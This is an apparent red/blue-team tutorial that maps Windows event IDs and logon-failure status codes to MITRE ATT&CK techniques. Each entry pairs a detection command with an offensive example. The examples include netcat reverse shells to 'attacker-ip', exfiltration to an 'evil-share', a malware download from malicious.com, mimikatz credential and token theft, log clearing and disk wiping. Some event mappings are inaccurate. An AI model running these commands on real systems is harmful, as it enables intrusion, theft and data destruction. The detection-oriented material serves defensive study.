0% found this document useful (0 votes)
142 views19 pages

Events Codes For Fun & Profit

The document provides details on common security event IDs and log entries that could indicate malicious activity on a system. It includes 16 sections that map events like failed logins, script execution, and process creation to MITRE ATT&CK tactics and techniques. Examples of offensive powershell commands are given for each event.

Uploaded by

Marcia Méndez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
142 views19 pages

Events Codes For Fun & Profit

The document provides details on common security event IDs and log entries that could indicate malicious activity on a system. It includes 16 sections that map events like failed logins, script execution, and process creation to MITRE ATT&CK tactics and techniques. Examples of offensive powershell commands are given for each event.

Uploaded by

Marcia Méndez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 19

HADESS WWW.HADESS.

IO
RedTeamRecipe
Red Team Recipe for Fun & Profit.
Share
Follow

Event Codes for fun &


profit(RTC0020)
Event Codes for fun & profit
Event ID Event Name
4720 A user account was created
4722 A user account was enabled
4723 An attempt was made to change an account’s password
4724 An attempt was made to reset an account’s password
4725 A user account was disabled
4726 A user account was deleted
4738 A user account was changed
4740 A user account was locked out
4767 A user account was unlocked
4727 A security-enabled global group was created
4730 A security-enabled global group was deleted
4731 A security-enabled local group was created
4734 A security-enabled local group was deleted
4754 A security-enabled universal group was created
4758 A security-enabled universal group was deleted
4727 A security-enabled global group was created
4730 A security-enabled global group was deleted
4728 A member was added to a security-enabled global group
4729 A member was removed from a security-enabled global group
4732 A member was added to a security-enabled local group
4733 A member was removed from a security-enabled local group
4728 A member was added to a security-enabled global group
4729 A member was removed from a security-enabled global group
4732 A member was added to a security-enabled local group
4733 A member was removed from a security-enabled local group
4756 A member was added to a security-enabled universal group
4757 A member was removed from a security-enabled universal group
4625 FAILED_LOGON
4104 POWERSHELL_SCRIPT_EXECUTION
5145 FILE_SHARE_ACCESS
5145 FILE_SHARE_ACCESS
4674 PRIVILEGE_ELEVATION
1102 LOG_CLEAR
4648 EXPLICIT_CREDENTIAL_LOGON
4663 FILE_DELETED
7045 SERVICE_INSTALLED
4104 POWERSHELL_SCRIPT_EXECUTION
4688 PROCESS_CREATED
4697 SERVICE_CREATED
4104 POWERSHELL_SCRIPT_EXECUTION
4698 SCHEDULED_TASK_CREATED
4672 SPECIAL_PRIVILEGES_ASSIGNED
4688 PROCESS_CREATED
1102 DUPLICATE_TOKEN
4673 TOKEN_PRIVILEGES_MODIFIED
4672 SPECIAL_PRIVILEGES_ASSIGNED
4104 SCRIPT_BLOCK_LOGGING
4103 ENGINE_LIFECYCLE
4104 SCRIPT_BLOCK_LOGGING
Event ID Event Name
5859 WMI_EVENT_FILTER_TO_CONSUMER_BINDING
5858 WMI_ACTIVITY_EXECQUERY
5157 FIREWALL_BLOCK
4104 SCRIPT_BLOCK_LOGGING
7045 SERVICE_INSTALLED
1102 LOG_CLEARED
4673 SENSITIVE_PRIVILEGE_USE
7000 SERVICE_START_FAILED
4660 OBJECT_DELETED
4689 PROCESS_TERMINATED
7034 SERVICE_CRASHED
4226 TCP/IP_CONNECTION_LIMIT_REACHED

Unauthorized Access Attempt:


ID: 001

MITRE Tactic & Techniques: Initial Access Phishing [T1566.001]


Event ID & Code: 4625 FAILED_LOGON
Status Code: 0x8007052e

Commands and Code: Auditpol /set /subcategory:"Logon" /success:enable


/failure:enable

Description: An attempt to log on with incorrect credentials was made.

Example Offensive Codes and Commands: net use \\target-system\IPC$


/user:username wrongpassword

Malware Execution:
ID: 002

MITRE Tactic & Techniques: Command and Scripting Interpreter


Execution [T1059]
Event ID & Code: 4104 POWERSHELL_SCRIPT_EXECUTION
Status Code: N/A

Commands and Code: Set-ExecutionPolicy Unrestricted

Description: Execution of PowerShell script detected.

Example Offensive Codes and Commands: powershell -ep bypass -f


malicious.ps1

Data Exfiltration:
ID: 003

MITRE Tactic & Techniques: Exfiltration Data Compressed [T1560.001]


Event ID & Code: 5145 FILE_SHARE_ACCESS
Status Code: N/A

Commands and Code: netsh trace start capture=yes

Description: Unauthorized access to file share detected.

Example Offensive Codes and Commands: copy /Z secretdata.zip \\evil-


share\stolen-data\

Lateral Movement:
ID: 004

MITRE Tactic & Techniques: Lateral Remote Services: SMB/Windows Admin


Movement Shares [T1021.002]
Event ID & Code: 5145 FILE_SHARE_ACCESS
Status Code:** N/A

Commands and Code:** net share admin$ /grant:username,FULL

Description: Unauthorized access to administrative shares detected.


Example Offensive Codes and Commands: net use \\target-system\admin$
/user:username password

Privilege Escalation:
ID: 005

MITRE Tactic & Techniques:** Privilege Bypass User Account Control


Escalation [T1548.002]
Event ID & Code: 4674 PRIVILEGE_ELEVATION
Status Code:** N/A

Commands and Code:** schtasks /run /tn "elevatedtask"

Description: Attempt to elevate privileges detected.

Example Offensive Codes and Commands: bypassuac.exe

Command and Control:


ID: 006

MITRE Tactic & Techniques: Command and Control Commonly Used Port [T1043]
Event ID & Code: 3 NETWORK_CONNECTION
Status Code: N/A

Commands and Code: netstat -an | findstr "443"

Description: Unusual network connection on commonly used port detected.

Example Offensive Codes and Commands: nc -e cmd.exe attacker-ip 443

Credential Dumping:
ID: 007

MITRE Tactic & Techniques: Credential Access Credential Dumping [T1003]


Event ID & Code: 1102 LOG_CLEAR
Status Code: N/A

Commands and Code: wevtutil cl Security

Description: Security log cleared possibly to hide credential dumping.

Example Offensive Codes and Commands: mimikatz.exe "privilege::debug"


"log" "sekurlsa::logonpasswords"

Domain Trust Discovery:


ID: 008

MITRE Tactic & Techniques: Discovery Domain Trust Discovery [T1482]


Event ID & Code: 4648 EXPLICIT_CREDENTIAL_LOGON
Status Code: N/A

Commands and Code: nltest /domain_trusts

Description: Explicit credential logon to discover domain trusts.

Example Offensive Codes and Commands:** nltest /dclist:domain

Network Scanning:
ID: 009

MITRE Tactic & Techniques: Discovery Network Service Scanning [T1046]


Event ID & Code: 3 NETWORK_CONNECTION
Status Code: N/A

Commands and Code: netstat -an | findstr "SYN_SENT"

Description: Network scanning activity detected through unusual SYN_SENT


statuses.

Example Offensive Codes and Commands: nmap -sS target-ip


File Deletion:
ID: 010

MITRE Tactic & Techniques: Defense Indicator Removal on Host


Evasion [T1070.004]
Event ID & Code:** 4663 FILE_DELETED
Status Code:** N/A

Commands and Code:** del /F /Q malicious-file.exe

Description:** Deletion of files to evade detection or remove evidence.

Example Offensive Codes and Commands:** sdelete -p 7 malicious-file.exe

System Reconfiguration:
ID: 011

MITRE Tactic & Techniques:** Persistence Modify System Image [T1542.003]


Event ID & Code:** 7045 SERVICE_INSTALLED
Status Code: N/A Commands and Code:** sc create malicioussvc binPath=
"malicious-file.exe"

Description: Installation of a new service which could indicate system


reconfiguration for persistence.

Example Offensive Codes and Commands: sc create evilservice binPath=


"C:\path\to\malicious.exe"

Scripting:
ID: 012

MITRE Tactic & Techniques: Execution Scripting [T1064]


Event ID & Code:** 4104 POWERSHELL_SCRIPT_EXECUTION
Status Code: N/A

Commands and Code: Set-ExecutionPolicy Bypass

Description:** Execution of scripts to automate tasks, potentially malicious.

Example Offensive Codes and Commands: powershell -File malicious-


script.ps1

Suspicious Process Execution:


ID: 013

MITRE Tactic & Techniques:** Execution Malicious File Execution [T1204]


Event ID & Code:** 4688 PROCESS_CREATED
Status Code: N/A

Commands and Code: Get-Process -Name suspicious-process

Description:** Execution of a potentially malicious process.

Example Offensive Codes and Commands:** start malicious-file.exe

Remote Process Execution:


ID:** 014

MITRE Tactic & Techniques:** Lateral Movement Remote File Copy [T1021.002]
Event ID & Code:** 4697 SERVICE_CREATED
Status Code: N/A

Commands and Code: sc \\remote-system create remotesvc binPath=


"malicious-file.exe"

Description: Creation of a new service for remote process execution.

Example Offensive Codes and Commands:** psexec \\remote-system -c


malicious-file.exe
Script-Based Process Execution:
ID: 015

MITRE Tactic & Techniques:** Execution Scripting [T1064]


Event ID & Code: 4104 POWERSHELL_SCRIPT_EXECUTION
Status Code: N/A

Commands and Code:** powershell -File script.ps1

Description: Execution of PowerShell scripts to initiate processes.

Example Offensive Codes and Commands: powershell -EncodedCommand


[Base64EncodedScript]

Process Injection:
ID: 016

MITRE Tactic & Techniques: Defense Evasion Process Injection [T1055]


Event ID & Code:** 8 CREATE_PROCESS
Status Code:** N/A

Commands and Code:** Get-Process -Name injected-process

Description:** Process injection to evade detection and execute malicious code.

Example Offensive Codes and Commands: Inject-Process -ProcessName


legitimate-process -Payload malicious-payload

Scheduled Task Execution:


ID: 017

MITRE Tactic & Techniques: Execution Scheduled Task/Job [T1053]


Event ID & Code: 4698 SCHEDULED_TASK_CREATED
Status Code: N/A

Commands and Code:** schtasks /create /tn "malicious-task" /tr "malicious-


file.exe"

Description:** Creation of scheduled tasks to execute processes at specified


times.

Example Offensive Codes and Commands:** schtasks /run /tn "malicious-task"

Token Impersonation:
ID: 018

MITRE Tactic & Techniques: Defense Evasion Token Manipulation [T1134]


Event ID & Code:** 4672 SPECIAL_PRIVILEGES_ASSIGNED
Status Code: N/A

Commands and Code:** whoami /priv

Description:** Assignment of special privileges indicative of token


impersonation.

Example Offensive Codes and Commands:** mimikatz "privilege::debug"


"token::elevate"

Create Process with Token:


ID:** 019

MITRE Tactic & Techniques:** Privilege Create Process with Token


Escalation [T1134.002]
Event ID & Code:** 4688 PROCESS_CREATED
Status Code:** N/A

Commands and Code:** Get-Process -Name new-process

Description: New process created with a token from another process.


Example Offensive Codes and Commands: mimikatz "token::run"
"process::create"

Token Duplication:
ID: 020

MITRE Tactic & Techniques:** Defense Evasion Token Manipulation [T1134]


Event ID & Code:** 1102 DUPLICATE_TOKEN
Status Code:** N/A

Commands and Code:** Get-EventLog -LogName Security -InstanceId 1102

Description:** Duplication of a token to use in a new process.

Example Offensive Codes and Commands:** mimikatz "token::duplicate"

Modify Token Privileges:


ID:** 021

MITRE Tactic & Techniques:** Privilege Escalation Modify Token [T1134.005]


Event ID & Code: 4673 TOKEN_PRIVILEGES_MODIFIED
Status Code:** N/A

Commands and Code:** whoami /priv

Description:** Modification of token privileges to elevate or change permissions.

Example Offensive Codes and Commands: mimikatz "token::addpriv"


"SeDebugPrivilege"

Token Theft:
ID: 022

MITRE Tactic & Techniques: Defense Evasion Token Manipulation [T1134]


Event ID & Code:** 4672 SPECIAL_PRIVILEGES_ASSIGNED
Status Code:** N/A

Commands and Code:** whoami /priv

Description:** Theft of a token to impersonate another user or escalate privileges.

Example Offensive Codes and Commands: mimikatz "token::steal" [Token ID]

PowerShell Script Execution:


ID: 023

MITRE Tactic & Techniques:** Execution PowerShell [T1059.001]


Event ID & Code:** 4104 SCRIPT_BLOCK_LOGGING
Status Code: N/A

Commands and Code: Set-ExecutionPolicy Bypass

Description:** Execution of PowerShell scripts which could be malicious.

Example Offensive Codes and Commands:** powershell -File malicious-


script.ps1

PowerShell Remote Command Execution:


ID: 024

MITRE Tactic & Techniques: Lateral Remote PowerShell Session


Movement [T1021.006]
Event ID & Code:** 4103 ENGINE_LIFECYCLE
Status Code:** N/A

Commands and Code:** Enter-PSSession -ComputerName target-system

Description:** Initiating a remote PowerShell session for lateral movement.

Example Offensive Codes and Commands:** Invoke-Command -ComputerName


target-system -ScriptBlock { malicious-command }
PowerShell Downloader Script:
ID: 025

MITRE Tactic & Techniques:** Command and Ingress Tool Transfer


Control [T1105]
Event ID & Code: 4104 SCRIPT_BLOCK_LOGGING
Status Code:** N/A

Commands and Code:** IWR -URI http://malicious.com/malware.exe -OutFile


C:\path\malware.exe

Description: PowerShell used to download malicious files from external


sources.

Example Offensive Codes and Commands: powershell -command "IWR -URI


http://malicious.com/malware.exe -OutFile C:\path\malware.exe"

PowerShell Credential Dumping:


ID: 026

MITRE Tactic & Techniques: Credential Access Credential Dumping [T1003]


Event ID & Code:** 4104 SCRIPT_BLOCK_LOGGING
Status Code:** N/A

Commands and Code:** Get-WmiObject -Class Win32_UserAccount

Description:** PowerShell commands used to access or dump credentials.

Example Offensive Codes and Commands:** powershell -command "Get-WmiObject


-Class Win32_UserAccount"

PowerShell Registry Modification:


ID: 027

MITRE Tactic & Techniques:** Defense Evasion Modify Registry [T1112]


Event ID & Code:** 4104 SCRIPT_BLOCK_LOGGING
Status Code: N/A

Commands and Code:** Set-ItemProperty -Path


'HKLM:\SYSTEM\CurrentControlSet\Services\malicious-service' -Name "Start" -

Value 2 Description:** PowerShell commands used to modify registry entries for

evasion or persistence.

Example Offensive Codes and Commands:** powershell -command "Set-


ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\malicious-

service' -Name 'Start' -Value 2"

WMI Persistence:
ID: 033

MITRE Tactic & Event Triggered Execution: Windows Management


Techniques:** Persistence Instrumentation Event Subscription [T1546.003]
Event ID & Code:** 5859 WMI_EVENT_FILTER_TO_CONSUMER_BINDING
Status Code: N/A

Commands and Code:** Get-WmiObject -Class __EventFilter -Namespace


root\subscription

Description:** Binding of WMI filter to consumer indicating a potential


persistence mechanism.

Example Offensive Codes and Commands: wmic /namespace:\\root\subscription


/interactive:off PATH CommandLineEventConsumer CREATE

WMI Remote Execution:


ID: 034

MITRE Tactic & Techniques:** Remote Services: Windows Management


Lateral Movement Instrumentation [T1021.005]
Event ID & Code:** 5858 WMI_ACTIVITY_EXECQUERY
Status Code:** N/A

Commands and Code:** Invoke-WmiMethod -Class Win32_Process -Name Create -


ArgumentList "malicious-file.exe"

Description:** Remote execution of commands or scripts via WMI.

Example Offensive Codes and Commands:** wmic /node:target-system process


call create "malicious-file.exe"

WMI Data Queries:


ID: 035

MITRE Tactic & Techniques:** Discovery Remote System Discovery [T1018]


Event ID & Code:** 5858 WMI_ACTIVITY_EXECQUERY
Status Code: N/A

Commands and Code:** Get-WmiObject -Class Win32_ComputerSystem

Description:** Querying system information via WMI for reconnaissance.

Example Offensive Codes and Commands:** wmic computersystem get


model,name,manufacturer

WMI System Configuration Modification:


ID:** 036

MITRE Tactic & Techniques:** Defense Modify System Image


Evasion [T1542.003]
Event ID & Code:** 5858 WMI_ACTIVITY_EXECQUERY
Status Code:** N/A

Commands and Code:** Set-WmiInstance -Class Win32_OperatingSystem -


Property @{Description='Modified System'}

Description:** Modifying system configurations via WMI.

Example Offensive Codes and Commands:** wmic os set description="Modified


System"

WMI Service Control:


ID:** 037

MITRE Tactic & Techniques: Execution Service Execution [T1569.002]


Event ID & Code:** 5858 WMI_ACTIVITY_EXECQUERY
Status Code:** N/A

Commands and Code:** Get-WmiObject -Class Win32_Service | Where-Object


{$_.Name -eq 'malicioussvc'} | Invoke-WmiMethod -Name StartService

Description:** Controlling services via WMI.

Example Offensive Codes and Commands:** wmic service malicioussvc call


startservice

Unauthorized Outbound Traffic:**


ID: 038

MITRE Tactic & Techniques:** Command and Commonly Used Port


Control [T1043]
Event ID & Code:** 5157 FIREWALL_BLOCK
Status Code:** N/A

Commands and Code:** Get-WinEvent -LogName "Microsoft-Windows-Windows


Firewall With Advanced Security/Firewall"

Description:** Firewall blocked unauthorized outbound traffic to a suspicious IP.

Example Offensive Codes and Commands: nc -e cmd.exe attacker-ip 443


Inbound Connection Attempt:
ID:** 039

MITRE Tactic & Techniques:** Initial Access External Remote Services [T1133]
Event ID & Code:** 5157 FIREWALL_BLOCK
Status Code:** N/A

Commands and Code:** netsh advfirewall firewall show rule name=all

Description:** Firewall blocked an unauthorized inbound connection attempt.

Example Offensive Codes and Commands:** nc -lvp 4444

Proxy Evasion Detection:**


ID:** 040

MITRE Tactic & Techniques:** Defense Proxy/Protocol Evasion


Evasion [T1090.003]
Event ID & Code: 5157 FIREWALL_BLOCK
Status Code: N/A

Commands and Code:** Get-NetFirewallRule -Direction Outbound | Where-


Object { $_.Enabled -eq True }

Description:** Unauthorized attempt to bypass proxy restrictions detected.

Example Offensive Codes and Commands:** curl -x http://evil-proxy:8080


http://target-website.com

Suspicious URL Request:


ID:** 041

MITRE Tactic & Techniques:** Command and Control Web Service [T1102]
Event ID & Code:** 5157 FIREWALL_BLOCK
Status Code:** N/A

Commands and Code:** grep "suspicious-url" /var/log/proxy.log

Description: Firewall or proxy log showing a request to a suspicious URL.

Example Offensive Codes and Commands:** curl http://suspicious-


url.com/malicious-payload

Unusual Protocol Usage:


ID:** 042

MITRE Tactic & Techniques:** Command and Control Non-Standard Port [T1571]
Event ID & Code:** 5157 FIREWALL_BLOCK
Status Code:** N/A

Commands and Code:** netsh advfirewall firewall add rule name="Block Non-
Standard Port" dir=out remoteport=1337 action=block

Description:** Firewall blocked traffic on a non-standard port indicating unusual


protocol usage.

Example Offensive Codes and Commands:** nc -e cmd.exe attacker-ip 1337

Code Obfuscation:
ID: 043

MITRE Tactic & Techniques:** Defense Obfuscated Files or Information


Evasion [T1027]
Event ID & Code: 4104 SCRIPT_BLOCK_LOGGING
Status Code:** N/A

Commands and Code:** powershell -encodedcommand <Base64EncodedCommand>

Description:** Executing obfuscated PowerShell commands.


Example Offensive Codes and Commands: powershell -encodedcommand
U3RhcnQtUHJvY2Vzcw== (Base64 for Start-Process)

Disabling Security Tools:


ID: 044

MITRE Tactic & Techniques:** Defense Evasion Indicator Blocking [T1054]


Event ID & Code:** 7045 SERVICE_INSTALLED
Status Code:** N/A

Commands and Code:** sc config "SecurityService" start= disabled

Description:** Disabling security services to evade detection.

Example Offensive Codes and Commands:** sc stop "SecurityService"

Tampering with Log Files:


ID:** 045

MITRE Tactic & Techniques:** Defense Indicator Removal on Host


Evasion [T1070]
Event ID & Code:** 1102 LOG_CLEARED
Status Code: N/A

Commands and Code:** wevtutil cl Security

Description:** Clearing event logs to hide malicious activities.

Example Offensive Codes and Commands:** wevtutil cl System

Bypassing User Account Control (UAC):


ID:** 046

MITRE Tactic & Techniques:** Defense Bypass User Access Control


Evasion [T1548.002]
Event ID & Code:** 4673 SENSITIVE_PRIVILEGE_USE
Status Code:** N/A

Commands and Code:** fodhelper.exe

Description:** Utilizing binaries to bypass UAC and elevate privileges.

Example Offensive Codes and Commands:** fodhelper.exe malicious-script.ps1

Rootkit Installation:**
ID: 047

MITRE Tactic & Techniques: Defense Evasion Rootkit [T1014]


Event ID & Code:** 7000 SERVICE_START_FAILED
Status Code:** N/A

Commands and Code: sc create rootkit binPath= "C:\path\rootkit.sys"

Description:** Installing a rootkit to hide malicious processes and files.

Example Offensive Codes and Commands:** sc start rootkit

Data Destruction:
ID: 048

MITRE Tactic & Techniques:** Impact Data Destruction [T1485]


Event ID & Code:** 4660 OBJECT_DELETED
Status Code:** N/A

Commands and Code: del /F /Q C:\important\*

Description:** Deliberate deletion of critical data.

Example Offensive Codes and Commands:** cipher /W:C:\important


Disk Wipe:**
ID: 049

MITRE Tactic & Techniques: Impact Disk Wipe [T1561]


Event ID & Code:** 4660 OBJECT_DELETED
Status Code:** N/A

Commands and Code:** format C: /P:1

Description:** Formatting the disk to wipe data.

Example Offensive Codes and Commands:** diskpart clean disk 0

Resource Hijacking:
ID:** 050

MITRE Tactic & Techniques: Impact Resource Hijacking [T1496]


Event ID & Code:** 4689 PROCESS_TERMINATED
Status Code:** N/A

Commands and Code:** start cryptominer.exe

Description:** Unauthorized use of resources for cryptomining.

Example Offensive Codes and Commands:** cryptominer.exe -pool


miningpool.com -user username -pass password

Service Stop:**
ID:** 051

MITRE Tactic & Techniques:** Impact Inhibit System Recovery [T1490]


Event ID & Code:** 7034 SERVICE_CRASHED
Status Code:** N/A

Commands and Code:** net stop "Critical Service"

Description: Stopping critical services to impair system recovery.

Example Offensive Codes and Commands:** sc stop "Critical Service"

Endpoint Denial of Service:


ID: 052

MITRE Tactic & Techniques:** Impact Endpoint Denial of Service [T1498]


Event ID & Code:** 4226 TCP/IP_CONNECTION_LIMIT_REACHED
Status Code:** N/A

Commands and Code:** hping3 --flood --rand-source target-system

Description:** Flooding the target system with network requests to cause denial
of service.

Example Offensive Codes and Commands: loic.exe /target target-system


/method TCP /threads 10

Windows logon failure events are captured in the Security log, and each logon
failure event provides a Status and Sub Status code that can help in identifying the
reason for the failure. Here are 20 examples of such codes:

Sub Status Example Commands and


ID Status Code Description
Code Code
net use \\target-system

1 0xC000006D 0xC000006A Incorrect password /user:username

wrongpassword

net use \\target-system


Username does not
2 0xC000006D 0xC0000064 /user:nonexistentuser
exist
password

Logon outside allowed


3 0xC000006D 0xC000006F N/A
times
Logon from disallowed
4 0xC000006D 0xC0000070 N/A
workstation or domain
Sub Status Example Commands and
ID Status Code Description
Code Code
net user username
5 0xC000006D 0xC0000071 Password expired
/expires:never

net user username


6 0xC000006D 0xC0000072 Account disabled
/active:no

7 0xC000006D 0xC000015B Logon type not granted N/A


Must change password net user username
8 0xC000006D 0xC0000193
at next logon /logonpasswordchg:yes

9 0xC000006E 0x0 Account restrictions N/A


lockoutstatus.exe
10 0xC0000070 0x0 Account locked out
username

net user username


11 0xC0000072 0x0 Account disabled
/active:no

12 0xC0000133 0x0 Clock skew N/A


13 0xC000015B 0x0 Logon type not granted N/A
Test-

14 0xC000018C 0x0 Trust relationship failed ComputerSecureChannel -


Repair

Network logon service


15 0xC0000192 0x0 net start netlogon
not started
Must change password net user username
16 0xC0000193 0x0
at next logon /logonpasswordchg:yes

Must change password net user username


17 0xC0000224 0x0
at next logon /logonpasswordchg:yes

Account locked due to


lockoutstatus.exe
18 0xC0000234 0x0 too many invalid
username
attempts
Failure actions delayed
19 0xC00002EE 0x0 N/A
for one hour
No secret material for
20 0xC0000371 0x0 N/A
specified account
1. Status: 0xC000006D

Sub Status: 0xC000006A


Description: This indicates that the attempted logon failed due to an
incorrect password.

2. Status: 0xC000006D

Sub Status: 0xC0000064


Description: This indicates that the specified username does not exist.

3. Status: 0xC000006D

Sub Status: 0xC000006F


Description: The user attempted to log on outside of allowed times as
defined by the account’s logon hours.

4. Status: 0xC000006D

Sub Status: 0xC0000070


Description: The user is attempting to log on from a workstation or
through a trusted domain that is not allowed.

5. Status: 0xC000006D

Sub Status: 0xC0000071


Description: The password for the specified account has expired.

6. Status: 0xC000006D

Sub Status: 0xC0000072


Description: The account is disabled and cannot be accessed.

7. Status: 0xC000006D

Sub Status: 0xC000015B


Description: The user has not been granted the requested logon type at
this machine.

8. Status: 0xC000006D
Sub Status: 0xC0000193
Description: The account’s password must be changed before logging on
the first time.
9. Status: 0xC000006E

Sub Status: 0x0


Description: Account restrictions are preventing this user from signing
in.

10. Status: 0xC0000070

Sub Status: 0x0


Description: The referenced account is currently locked out and may not
be logged on to.

11. Status: 0xC0000072

Sub Status: 0x0


Description: The account is currently disabled.

12. Status: 0xC0000133

Sub Status: 0x0


Description: Clocks on the client and server machines are skewed.

13. Status: 0xC000015B

Sub Status: 0x0


Description: The user has not been granted the requested logon type at
this machine.

14. Status: 0xC000018C

Sub Status: 0x0


Description: The logon request failed because the trust relationship
between the primary domain and the trusted domain failed.

15. Status: 0xC0000192

Sub Status: 0x0


Description: An attempt was made to logon, but the network logon
service was not started.

16. Status: 0xC0000193

Sub Status: 0x0


Description: The user’s password must be changed before logging on the
first time.

17. Status: 0xC0000224

Sub Status: 0x0


Description: User logon with a password must change at next logon
condition.

18. Status: 0xC0000234

Sub Status: 0x0


Description: The user account has been automatically locked because too
many invalid logon attempts or password change attempts have been
requested.

19. Status: 0xC00002EE

Sub Status: 0x0


Description: Failure actions can only be delayed for a period of one hour.

20. Status: 0xC0000371

Sub Status: 0x0


Description: The local account store does not contain secret material for
the specified account.

Failure
Description
Code
0x6 The user doesn’t exist
Failure
Description
Code
0x9 Password must be reset
Account disabled, account expired, account locked out, or out of
0x12
logon hours
0x17 Password expired
0x18 Wrong password
0x20 Ticket expired

Windows API to Sysmon Event


0x25 The workstation’s clock is out of sync with the DC’s
Sysmon ID
Resources
Effective Threat Investigation by Mostafa Yahia
https://github.com/jsecurity101/Windows-API-To-Sysmon-Events
Rating:
20 Oct 2023
tutorial
#blue #red

« Top 50 Techniques &


Procedures(RTC0019)

comments powered by Disqus


Explore → tutorial (25) news (1) recipe (3)

Copyright © 2023 RedTeamRecipe


Brought to you by HADESS

You might also like